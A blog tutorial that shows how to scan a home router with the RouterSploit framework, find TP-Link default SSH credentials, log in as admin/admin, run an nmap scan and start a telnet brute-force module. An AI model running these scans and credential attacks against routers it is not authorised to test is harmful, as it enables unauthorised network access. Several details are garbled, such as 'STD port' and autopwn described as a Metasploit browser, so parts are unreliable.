Router Pentesting Using RouterSploit | Network Penetration Test

router pentesting

In this article, we will demonstrate how to use RouterSploit framework to find vulnerabilities in the router. The RouterSploit Framework is an open-source exploitation framework used for penetration testing of routers called as router pen-testing. It consists of various module that performs router penetration testing operations like exploitation, credentials, scanners, payloads and generic.

The RouterSploit framework basically performs three main modules:

  • Exploiting module: It contains all the publicly available exploits.
  • Creds Module: Used for testing logins for different devices.
  • Scanner Modules: Check particular exploits against a specific device.

NOTE: RouteSploit is not an official Kali Linux tool.

Let’s see how to scan and exploit our router. Let’s move on to the Kali Linux and get the framework from GitHub. Open the terminal in Kali Linux and download router exploit. Before that change the directory location to the desktop for easy navigation as follows:

root@kali: ~/ cd Desktop

Since it’s case sensitive, make sure to spell it properly. Here cd command is used to change the directory.

Now, once you’re in Desktop directory type below command in terminal to download RouterSploit Framework.

root@kali: ~/Desktop/ git clone https://github.com/threat9/routersploit

Now, you’ll see that the framework is clone in the desktop. Before running the framework you need to have Python installed prerequisite because the framework is developed in Python programming language. Type the following command to install it:

root@kali: ~/Desktop/ apt-get install python3-pip

Now change your directory to router sploit folder:

root@kali: ~/Desktop/cd routersploit

Now, install some of the dependencies of RouterSploit framework as below:

root@kali: ~/Desktop/routersploit # python3 -m pip install -r requirements.txt

Here,

  • m means library module
  • pip is the tool for installing and managing Python packages
  • r for installation from the given requirements.
Read also:  Top 15 common cyber attacks that might ruin your life

So, the command says that install the dependencies as stated in the requirements file. If you’re doing this for the first time you may get a different output than mine.

Now, it’s time to run the RouterSploit framework. Type the command:

root@kali: ~/Desktop/routersploit # python3 rsf.py

Here, we’re executing the python program which is inside the desktop in routersploit directory. Now, we’re in the rsf console. Type show all and hit enter.

You will see all the modules of RouterSploit. Now type:

rsf> search autopwn

Autpwn is a Metasploit browser that is used to test browser vulnerabilities. You can see it’s under the scanner. So let’s use it

rsf> use scanners/autopwn

Now type show options for all available options

rsf(AutoPwn) > show options

Here you can see two options:

  • Target option and
  • Module options.

Now set the threads to 30 for quick performance.

rsf (AutPwn)> set threads 30

Now, set the target router IP. If you don’t know the IP click new terminal or ctrl+shift key to pen the new terminal in Kali Box.

type ifconfig to see the IP address or alternatively, type ip r and hit enter. From here you can see the router IP. Usually, the router IP tends to be the first IP that is 192.168.0.1

Now go to rsf console and set target ip as

rsf(AutoPwn) > set target 192.168.0.1

Now run the vulnerability scan

rsf(AutoPwn) > run

The scan is complete but no vulnerability is found.

So what do we do next?

Using ssh default credentials for finding a script

Let’s go back to the rsf console from autopwn

rsf(AutoPwn) > back

Search for exploits or credentials or anything else that is available for my router brand i.e. tp-link

rsf > search tplink

Run ssh default credentials for finding a script.

Read also:  Top 15 common cyber attacks that might ruin your life

Now type use…copy and paste the script and hit enter.

scripts> use creds/routers/tplink/sh-default_creds

rsf(TP-Link Router Default SSH Creds) > show options

Now once all the options are displayed. This time set the thread to 10 and set the target IP address

rsf(TP-Link Router Default SSH Creds) > set threads 10

rsf(TP-Link Router Default SSH Creds) > set target 192.168.0.1

Finally, run the exploit

rsf(TP-Link Router Default SSH Creds) > run

You see the default login credentials of the target router. The login username is admin and the password is also admin.

Now, in the second terminal let’s try to access using ssh as

root@kali: ~/Desktop/routersploit # ssh admin@192.168.0.1

Enter the password as admin.

You see that the router credentials are correct but we couldn’t log into the router via ssh due to various reasons.

The router is unable to provide its console. However, the vulnerability assessment and exploitation technique with the framework are the same to all routers.

Using Nmap code scan in RouterSploit

Now, go to the second terminal window and perform Nmap code scan against the router to find if the STD port is open so that we can login from our browser.

root@kali: ~/Desktop/routersploit # nmap -sS 192.168.0.1

So we can see that STD port is open so let’s try to login via browser.

Type in terminal

root@kali: ~/Desktop/routersploit # firefox 192.168.0.1

Now, the router page is open. Enter the desired credential and click on the login button. You’ll be able to login to the router successfully.

Using Creds Module in RouterSploit.

Now, let’s talk about the creds module in RouterSploit which is generally used for testing combinations of default password through a dictionary attack.

use creds/telnet_bruteforce

After typing above command, follow the previous steps and look for available option by typing “show options” then set the target as above by typing “set target ” and in the end run the exploit.

Read also:  Top 15 common cyber attacks that might ruin your life

So, now you know how to use three modules of the RouterSploit. If you like this article share this on Twitter, Facebook, and LinkedIn. I inspire to create more!…

Note: This article is solely for knowledge purpose. Any misuse of this article is strongly discouraged by us.